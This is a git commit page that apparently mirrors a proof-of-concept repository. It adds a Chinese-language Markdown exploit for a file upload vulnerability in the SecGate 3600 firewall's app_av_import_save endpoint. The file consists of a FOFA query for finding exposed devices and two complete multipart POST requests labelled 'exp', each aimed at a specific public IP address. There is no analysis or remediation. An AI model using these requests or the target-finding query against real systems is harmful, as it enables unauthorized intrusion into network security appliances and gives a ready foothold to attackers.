mirror of
https://github.com/wooluo/POC00.git
synced 2026-03-18 21:24:52 +08:00
Create 网神防火墙 app_av_import_save文件上传漏洞.md
This commit is contained in:
parent
448cd7b38d
commit
c30d537682
73
网神防火墙 app_av_import_save文件上传漏洞.md
Normal file
73
网神防火墙 app_av_import_save文件上传漏洞.md
Normal file
@ -0,0 +1,73 @@
|
||||
|
||||
## 网神防火墙 app_av_import_save文件上传漏洞
|
||||
|
||||
## fofa
|
||||
```
|
||||
title="网神SecGate 3600防火墙"
|
||||
```
|
||||
|
||||
|
||||
## exp
|
||||
```
|
||||
POST /?g=app_av_import_save HTTP/1.1
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Accept-Language: zh-CN,zh;q=0.9
|
||||
Connection: close
|
||||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc
|
||||
Cache-Control: no-cache
|
||||
Pragma: no-cache
|
||||
Host: 218.60.144.129
|
||||
Content-Length: 536
|
||||
|
||||
------WebKitFormBoundaryJpMyThWnAxbcBBQc
|
||||
Content-Disposition: form-data; name="MAX_FILE_SIZE"
|
||||
|
||||
10000000
|
||||
------WebKitFormBoundaryJpMyThWnAxbcBBQc
|
||||
Content-Disposition: form-data; name="upfile"; filename="test.txt"
|
||||
Content-Type: text/plain
|
||||
|
||||
test111
|
||||
------WebKitFormBoundaryJpMyThWnAxbcBBQc
|
||||
Content-Disposition: form-data; name="submit_post"
|
||||
|
||||
obj_app_upfile
|
||||
------WebKitFormBoundaryJpMyThWnAxbcBBQc
|
||||
Content-Disposition: form-data; name="__hash__"
|
||||
|
||||
0b9d6b1ab7479ab69d9f71b05e0e9445
|
||||
------WebKitFormBoundaryJpMyThWnAxbcBBQc--
|
||||
```
|
||||
|
||||
```
|
||||
POST /?g=obj_app_upfile HTTP/1.1
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Accept-Language: zh-CN,zh;q=0.9
|
||||
Connection: close
|
||||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc
|
||||
Cache-Control: no-cache
|
||||
Pragma: no-cache
|
||||
Host: 218.60.144.129
|
||||
Content-Length: 536
|
||||
|
||||
------WebKitFormBoundaryJpMyThWnAxbcBBQc
|
||||
Content-Disposition: form-data; name="MAX_FILE_SIZE"
|
||||
|
||||
10000000
|
||||
------WebKitFormBoundaryJpMyThWnAxbcBBQc
|
||||
Content-Disposition: form-data; name="upfile"; filename="test.txt"
|
||||
Content-Type: text/plain
|
||||
|
||||
test111
|
||||
------WebKitFormBoundaryJpMyThWnAxbcBBQc
|
||||
Content-Disposition: form-data; name="submit_post"
|
||||
|
||||
obj_app_upfile
|
||||
------WebKitFormBoundaryJpMyThWnAxbcBBQc
|
||||
Content-Disposition: form-data; name="__hash__"
|
||||
|
||||
0b9d6b1ab7479ab69d9f71b05e0e9445
|
||||
------WebKitFormBoundaryJpMyThWnAxbcBBQc--
|
||||
```
|
||||
Loading…
x
Reference in New Issue
Block a user